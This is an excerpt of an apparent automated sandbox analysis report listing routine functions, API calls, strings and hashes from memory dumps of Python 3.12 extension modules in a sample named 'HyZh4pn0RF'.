Opcode ID: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
Instruction ID: 56c9377ec28c5212e66c615db8f32db6f7036a036dda46b0706926466bf1c305
Opcode Fuzzy Hash: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
Instruction Fuzzy Hash: C04107B2B1A785C2E611CB3EE4457AA7BA4EB96780F004166EE8E07755CB3DD506CB10

Function 00007FFBAA59BDF0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA59BEC6

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA59BF60
%s at line %d of [%.10s], xrefs: 00007FFBAA59BF79
database corruption, xrefs: 00007FFBAA59BF6D

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 2221118986-3418467682
Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
Instruction ID: 6c8b55dc5fc11e99bbcd6674da76a6f246ab2c8eacf66fb2ccc9fe854330277c
Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
Instruction Fuzzy Hash: 0841FFA2A19745C2EB618F25E08027D73A8FB85B80F561435EF8D4B794DF3CD802CB50

Function 00007FFBAB6A2E10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

PyObject_RichCompareBool.PYTHON312 ref: 00007FFBAB6A2E78
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2E8E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2EA2

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$BoolCompareObject_Rich
String ID:
API String ID: 74976934-0
Opcode ID: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
Instruction ID: 57e13651b9a9e1f186a9b002a24521be0db223391998cd44a44a051f09cd007e
Opcode Fuzzy Hash: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
Instruction Fuzzy Hash: 71118472A9A54285EB568B3DED44378A3B0BF15BB0F08A334DE79066F5DF2CD8908700

Function 00007FFBAB6A4C90 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4CBC
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4CE5
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4D0E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4D30

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
Instruction ID: 346d17c3f3388afb545fb8fec5403a41b2d5d9b4b6f3d3c1d2c5532ce95dc217
Opcode Fuzzy Hash: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
Instruction Fuzzy Hash: 7821C9B690760181EB6A9F78DC5837462B0AF15B39F24A338CE7E411E18F7EA4818310

Function 00007FFBAB63150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB631538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB631546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB631552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB631562

Memory Dump Source

Source File: 00000002.00000002.1836553428.00007FFBAB631000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFBAB630000, based on PE: true

Associated: 00000002.00000002.1836525586.00007FFBAB630000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836582037.00007FFBAB632000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836611692.00007FFBAB634000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab630000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
Instruction ID: e3fd64ca7e4d43d19290955613649dd6a89843f59b6700378ee2299ab99724c8
Opcode Fuzzy Hash: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
Instruction Fuzzy Hash: C1110662B15B018AEB018F74EC942A873A4FB19758F446E31DE6D467A4DF78D198C240

Function 00007FFBAB62150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB621538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB621546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB621552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB621562

Memory Dump Source

Source File: 00000002.00000002.1836441466.00007FFBAB621000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFBAB620000, based on PE: true

Associated: 00000002.00000002.1836411766.00007FFBAB620000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836470162.00007FFBAB623000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836497438.00007FFBAB625000.00000002.00000001.01000000.00000028.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab620000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction ID: 0e7e0c4cafddcbed1c7c71de9d45907e4d43c55c27e02f13b34c11552c1c5ce5
Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction Fuzzy Hash: E5111562F15B018AFB008F74EC542B873A4FB19B58F446E31EE6D867A4DF78D1988340

Function 00007FFBAB61150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB611538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB611546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB611552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB611562

Memory Dump Source

Source File: 00000002.00000002.1836320124.00007FFBAB611000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFBAB610000, based on PE: true

Associated: 00000002.00000002.1836281824.00007FFBAB610000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836352217.00007FFBAB613000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836382631.00007FFBAB615000.00000002.00000001.01000000.00000029.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab610000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction ID: 1be4ed3b3c8428b121f9101a6f7b34abbbdb706154d432089b46c4bb851e2133
Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction Fuzzy Hash: 42113A62B15B0189EB00CF74FC442A873A8F718759F041D32DE6D837A4DF78D1988340

Function 00007FFBAB6B3E9C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB6B3EC8
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB6B3ED6
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB6B3EE2
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB6B3EF2

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
Instruction ID: 4764871985beb07b2c87832b93818665b810fe1ea0db80f99aee4df8e7d5ba83
Opcode Fuzzy Hash: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
Instruction Fuzzy Hash: 86113A62B59B0589EF018FB4ECA42B873B4FB18758F441D31DE6D427A4DF38D1988280

Function 00007FFBAB65150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB651538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB651546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB651552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB651562

Memory Dump Source

Source File: 00000002.00000002.1836808470.00007FFBAB651000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FFBAB650000, based on PE: true

Associated: 00000002.00000002.1836782497.00007FFBAB650000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836836073.00007FFBAB653000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836866266.00007FFBAB655000.00000002.00000001.01000000.00000025.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab650000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction ID: d55e7293b32d73ef2514255e3e24e9719b9c60ad9ad02fa189df6c3aefa1aee5
Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
Instruction Fuzzy Hash: B8114862B15B018AEB018F74EC446B973A4FB18B58F442E31DE6E427A8DF38D1A88350

Function 00007FFBAA462C1C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAA462C48
GetCurrentThreadId.KERNEL32 ref: 00007FFBAA462C56
GetCurrentProcessId.KERNEL32 ref: 00007FFBAA462C62
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAA462C72

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
Instruction ID: 28b91838cf368c57857a09685e2d42be6b425ac62e832b285bb0e5c091f1663c
Opcode Fuzzy Hash: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
Instruction Fuzzy Hash: DA111C66B15F01CAEB008F70E8542B833A8FB19B58F440D35EE6D46BA4EF78E1598390

Function 00007FFBAB66150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB661538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB661546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB661552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB661562

Memory Dump Source

Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true

Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 35793672486907f85f78470f91632de72c2c77bd04ed6848e52fa048c16991bf
Instruction ID: 9f526604d0e2294b571b15cde73271ddb6799066665206f2c2a60bdce3eb84a9
Opcode Fuzzy Hash: 35793672486907f85f78470f91632de72c2c77bd04ed6848e52fa048c16991bf
Instruction Fuzzy Hash: 0D114C72B15B058AEB00CF74EC652B873A4FB1A758F442D35DE6D467A4DF38D1988380

Function 00007FFBAB5F150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFBAB5F1538
GetCurrentThreadId.KERNEL32 ref: 00007FFBAB5F1546
GetCurrentProcessId.KERNEL32 ref: 00007FFBAB5F1552
QueryPerformanceCounter.KERNEL32 ref: 00007FFBAB5F1562

Memory Dump Source

Source File: 00000002.00000002.1835891032.00007FFBAB5F1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFBAB5F0000, based on PE: true

Associated: 00000002.00000002.1835837141.00007FFBAB5F0000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835936380.00007FFBAB5F6000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835980235.00007FFBAB5FB000.00000002.00000001.01000000.0000002B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab5f0000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
Instruction ID: 5d49ed3bee8b21f933c9e5f54e2e145c34417feb77aa4e27fc9b7b99f58e227b
Opcode Fuzzy Hash: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
Instruction Fuzzy Hash: 44111862B15B018AEB018F70E8642B873A8FB19758F444E35DE6D467A5EF78E19C8340

Function 00007FFBAB6A3520 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$ArgsCallDeallocErr_InstanceObject
String ID:
API String ID: 469999563-0
Opcode ID: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
Instruction ID: 47268cc505506799c18709180954d91fb854cc8aa88c00e24bd6aefac4b8eeb4
Opcode Fuzzy Hash: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
Instruction Fuzzy Hash: A3F0CDB1A5AA0281EA964B7AED54279E2B1AF44BD1F04E034CD6D06774DE3CD4908700

Function 00007FFBAB6A4050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

PyUnicode_New.PYTHON312 ref: 00007FFBAB6A4079
PyObject_Str.PYTHON312 ref: 00007FFBAB6A41BA

Strings

gfffffff, xrefs: 00007FFBAB6A40F4

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_Unicode_
String ID: gfffffff
API String ID: 3285369508-1523873471
Opcode ID: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
Instruction ID: 50bac6ab4aede6a4e947db691c4b986fc45b3cc24432aa068aba13bedf51bea6
Opcode Fuzzy Hash: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
Instruction Fuzzy Hash: D6412BE2B0D78582EB018B2AEC113B9ABA0EB617D0F446134DE6E477A5DE3CE541C741

Function 00007FFBAB6A93B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6A93EB

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Part of subcall function 00007FFBAB6A3880: PyThreadState_Get.PYTHON312 ref: 00007FFBAB6A38A2
Part of subcall function 00007FFBAB6A3880: PyErr_Fetch.PYTHON312 ref: 00007FFBAB6A38BA
Part of subcall function 00007FFBAB6A3880: PyCode_NewEmpty.PYTHON312 ref: 00007FFBAB6A38CD
Part of subcall function 00007FFBAB6A3880: PyFrame_New.PYTHON312 ref: 00007FFBAB6A38E7
Part of subcall function 00007FFBAB6A3880: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3902
Part of subcall function 00007FFBAB6A3880: _PyErr_ChainExceptions1.PYTHON312 ref: 00007FFBAB6A390D

Strings

reset, xrefs: 00007FFBAB6A940B
charset_normalizer.md.MessDetectorPlugin, xrefs: 00007FFBAB6A93F8

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_$ChainCode_DeallocEmptyExceptions1FetchFormatFrame_State_SubtypeThreadType_
String ID: charset_normalizer.md.MessDetectorPlugin$reset
API String ID: 2783664582-4122180197
Opcode ID: 76f6fa13b8723754b9a60dd584603b75876082391e851e7e34e3c089995dae12
Instruction ID: d3f65f2a82077893dd9cc1450bcf213bd1fe1161e34d4fc861cf16fe58adc555
Opcode Fuzzy Hash: 76f6fa13b8723754b9a60dd584603b75876082391e851e7e34e3c089995dae12
Instruction Fuzzy Hash: E50129E1A4A50641EE1A9BBEEC511B5E2B5AF45BC0B98E03ACD2D473B1DE2CE551C310

Function 00007FFBAB6B23B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

PyImport_Import.PYTHON312 ref: 00007FFBAB6B23C0
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B23F5

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocImportImport_
String ID: <module>
API String ID: 187899110-217463007
Opcode ID: d69bcf240f74489f4bd497fc0b8f2cc414bf2c6a77f5002b559556706f64d9ad
Instruction ID: 49f27026276e07d5a1a41752aa2f48a9da367d3e46126dcac61276b224847e94
Opcode Fuzzy Hash: d69bcf240f74489f4bd497fc0b8f2cc414bf2c6a77f5002b559556706f64d9ad
Instruction Fuzzy Hash: 4E01FAF6A9BA1281EA1B9BADEC50179E3B1BF84B90B44E434CD2E13670DF2DA5458700

Function 00007FFBAB6B3533 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B3552
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3570

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_Item
String ID: <module>
API String ID: 1953171116-217463007
Opcode ID: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
Instruction ID: 6113cca0d628b880af22ced7ab1dc6baeb79c198a20795d321f999102173570b
Opcode Fuzzy Hash: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
Instruction Fuzzy Hash: 1701E9E2E9BA0691EA039BBDDC50678A3B0BF44B90F44E435CD2D072B1DE3DE5418300

Function 00007FFBAA464B1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAA464B6C
PyUnicode_FromString.PYTHON312 ref: 00007FFBAA464B89

Strings

no such name, xrefs: 00007FFBAA464B62

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: String$Err_FromUnicode_
String ID: no such name
API String ID: 3678473424-4211486178
Opcode ID: 486a057b87cc78e3bf1f4718cf85fd2ddf776dd4b60ee12a49ea37b0645cc7c2
Instruction ID: 900458994d3c68fb378dcb83d384998e0872191f28fe664bca242bc12725a5b6
Opcode Fuzzy Hash: 486a057b87cc78e3bf1f4718cf85fd2ddf776dd4b60ee12a49ea37b0645cc7c2
Instruction Fuzzy Hash: 29012CB1A1A642C6FB629B31E8517B963A8BF98F95F440071EE4E46750EF3CE0068721

